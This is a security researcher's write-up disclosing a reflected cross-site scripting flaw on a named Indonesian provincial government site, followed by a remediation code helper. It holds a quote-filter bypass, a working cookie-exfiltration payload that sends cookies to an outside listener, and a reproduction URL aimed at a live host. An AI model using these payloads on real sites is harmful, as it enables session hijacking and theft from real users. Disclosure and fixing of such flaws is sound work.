I found a Reflected Cross-Site Scripting (XSS) vulnerability on the Indonesian government's Bali Province platform (baliprov.go.id). The flaw is in the page parameter of the search endpoint, where user input is reflected inside a JavaScript context without proper sanitization.

Vulnerability Details

Technical Analysis & Bypass

The application filters double and single quotes (", ') and the plus sign (+). I bypassed this using template literals (backticks) and string interpolation (${}), which need neither character.

How it looks in the source code:

this.fetchResults([INJECTION_HERE]);

By injecting 11); [CODE] ; //, I broke out of the function call and executed my own JS instructions.

Payloads:

PoC: 11); alert(document.domain); //
Exfiltration: 11); window.location=`https://webhook.site/ID?c=${document.cookie}`; //

Steps to Reproduce:

  1. Go to: https://balisatudata-ng.baliprov.dev/search?page=11)%3b+alert(document.cookie)%3b+%2f%2f&q=test
  2. The script executes, and the cookie is displayed or sent to the external listener.

Impact:

  • Session Hijacking: Stealing sensitive session cookies.
  • Unauthorized Actions: Performing tasks as the logged-in user.
  • Phishing: Redirecting users to malicious sites.

Solution

  • Strict Validation: Allow only integer values for the page parameter.
  • Output Encoding: Use proper encoding before reflecting any URL parameters into JavaScript.

Author: Osama Alaa (Security Researcher)
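As an added example that is not part of the original report or the vendor's code, here are the two remediation steps above (integer-only page, encoded output for anything else) as a small Node.js helper; the function names, the second query argument and the page limit are assumptions:

```javascript
// Added example (not the vendor's code): a hardened way to reflect the
// `page` query parameter into an inline script such as
//   this.fetchResults(<page>);
// Function and parameter names, and MAX_PAGE, are hypothetical.

const MAX_PAGE = 100000; // assumed upper bound for pagination

// Strict validation: only a plain decimal integer in [1, MAX_PAGE] passes.
// Anything else (arrays from repeated params, "11); alert(1); //", "1e3",
// " 12", "+5") is rejected and replaced by the default page.
function parsePageParam(raw, fallback = 1) {
  if (typeof raw !== 'string') return fallback;
  if (!/^[1-9][0-9]{0,5}$/.test(raw)) return fallback;
  const n = Number(raw);
  return n <= MAX_PAGE ? n : fallback;
}

// Output encoding for values that really must be strings inside a script:
// JSON.stringify yields a double-quoted JS string literal, then the
// characters that could close the <script> element or break the literal
// are escaped as \uXXXX so the result stays a single string token.
// Inside a double-quoted literal, backticks and ${} are inert.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

// Renders the inline call. `page` is a validated number, so it is emitted
// bare; `query` is free text, so it is emitted as an encoded literal.
function renderFetchCall(rawPage, rawQuery) {
  const page = parsePageParam(rawPage);
  const query = toJsStringLiteral(rawQuery ?? '');
  return `this.fetchResults(${page}, ${query});`;
}

// Constructed inputs: the payload shape from the report, then a benign one.
console.log(renderFetchCall('11); alert(document.domain); //', 'test'));
// → this.fetchResults(1, "test");
console.log(renderFetchCall('11', '</script><script>`${1}`'));
```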